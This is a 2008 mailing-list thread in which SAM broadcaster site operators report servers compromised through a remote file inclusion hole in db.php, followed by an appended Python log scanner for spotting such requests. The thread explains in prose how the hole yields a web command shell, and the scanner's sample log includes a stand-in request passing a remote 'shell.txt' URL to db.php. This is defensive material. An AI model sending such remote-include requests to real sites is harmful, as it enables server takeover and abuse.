Yes
My site was also hit.
3 phishing sites, and then because of mass email it brought it to its knees.
And it was traced back to db.php.
This happened to my site Friday so about 6 days ago.

It is possible someone is going through the AudioRealm yp and looking at
stations.
Just a thought.

----- Original Message -----
From: "Roy Pait" <[email protected]>
To: <[email protected]>
Sent: Wednesday, January 09, 2008 12:39 PM
Subject: Re: [General-discussion] PHP Website Vulnerability.


Just so everyone knows, this is not a theoretical vuln. My server was hacked
5 days ago (fortunately minimally) and a couple of eggdrop (IRC relay)
programs installed along with some extraneous PHP files (baca.php). It was
fairly easily detected and cleaned up, but I tracked it back to db.php, which
was being used. I renamed the file (which of course stopped the web site)
and then cleaned up. The basic premise is that the common setting is passed
a URL of a site with a PHP text file. This file is parsed and run on the
local system and displays a web page (in PHP) with a command line area. From
there it's a simple matter of issuing FTP requests and installing web (PHP
or Perl) apps. The user has access at the level that the web server is running
at. This was a slightly modified version of the SAM 3 default site, so the
exploit's been there for a while, but is now known and hackers are actively
looking for it. Google is real helpful in that respect, based on the referrer
listing just before the hack.

Fortunately my firewall blocked most of what they were trying to do (IRC bot
relay and spam generation triggered by the bot, as I disallow IRC from all
machines and SMTP is only available from the main server).


Roy Pait

>>> "James Henline" <[email protected]> 1/9/2008 9:36 AM >>>
Please see the following news article for more information.

http://www.spacialaudio.com/news/index.html?newsID=151


_______________________________________________
General-discussion mailing list
[email protected]
http://mailman.spacialaudio.com/mailman/listinfo/general-discussion
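Both posters traced the compromise back to db.php being handed a remote URL in a request, so a quick way to confirm whether your own server was probed the same way is to scan the web server log for requests whose query parameters carry a URL that PHP would fetch from another host. The script below is an added example, not code from the thread or from SAM; the log lines, IP addresses, host names and the "common" parameter name are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Combined log format: client, ident, user, [time], "request", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# URL schemes that PHP's include()/require() will fetch when allow_url_fopen is on.
REMOTE_SCHEMES = {"http", "https", "ftp"}

# Constructed sample lines (not from the original thread). IPs, hosts and the
# "common" parameter name are assumptions made for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jan/2008:10:02:11 +0000] "GET /db.php?common=http://example.invalid/shell.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [09/Jan/2008:10:02:15 +0000] "GET /db.php?common=settings HTTP/1.1" 200 4096 "http://www.example.invalid/" "Mozilla/5.0"
203.0.113.5 - - [09/Jan/2008:10:03:01 +0000] "GET /index.php?page=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 120 "-" "curl/7.1"
not a log line at all
"""

def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def remote_params(target):
    """Yield (name, value) for each query parameter whose (percent-decoded) value is a remote URL."""
    query = urlparse(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            u = urlparse(value)
            if u.scheme.lower() in REMOTE_SCHEMES and u.netloc:
                yield name, value

def find_remote_includes(log_text):
    """Report every request that passes a remote URL in a query parameter, for any script."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue  # skip lines that are not in combined log format
        for name, value in remote_params(rec["target"]):
            hits.append({"client": rec["client"], "time": rec["time"],
                         "script": urlparse(rec["target"]).path,
                         "param": name, "url": value})
    return hits

if __name__ == "__main__":
    for h in find_remote_includes(SAMPLE_LOG):
        print(f'{h["time"]} {h["client"]} {h["script"]} {h["param"]}={h["url"]}')
```

Run it against the real access log instead of SAMPLE_LOG; a hit against db.php (or any script) with a remote URL in a parameter is the sign that the include path described above was tried, and the client and time tell you where to look next.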